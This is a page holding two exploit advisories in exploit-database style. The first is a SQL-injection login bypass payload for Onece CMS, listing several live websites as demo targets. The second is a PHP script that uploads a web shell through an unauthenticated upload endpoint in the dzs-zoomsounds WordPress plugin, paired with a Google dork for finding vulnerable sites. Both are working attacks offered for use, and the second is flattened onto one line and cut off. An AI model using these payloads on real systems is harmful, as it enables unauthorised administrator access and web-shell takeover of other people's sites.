#########################################################
# Exploit Title: [ Old Onece CMS Bypass Administrator ]
########################################################
# Google Dork: [-]
# Date: [16/09/2015]
# Exploit Author: [Izza009 | United Islamic Cyber Force]
# Vendor Homepage: [onece.fr]
# Software Link: [-]
# Version: [Old]
# Tested on: [Win 8.1/Kali]
# CVE : [-]
########################################################
#
# User & Pass : '=''or'
#
#######################################################
# Demo: http://www.us-epl.com/
# http://www.byepl-paris.com/
# http://old.onece.fr/
#
##########################################################
# Thanks to : Allah | Rosulullah |
# | United Islamic Cyber Force | Muslim Corporation Cyber | We Are Mujahidin Cyber Army
# | Izza009 | xGame1945 | MrBz Elfatir | El-Muhajimi |[!] Jihad797 [!] | 1D10T
##############################################################
################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http: //digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date : 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil = "dz.phtml" ; $ch = curl_init( "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS, array ( 'file_field' => "@$evil" )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); echo "$postResult" ; ?> Shell Access : http: //127.0.0.1/wp-content/plugins/dzs-zoo...

Comments
Post a Comment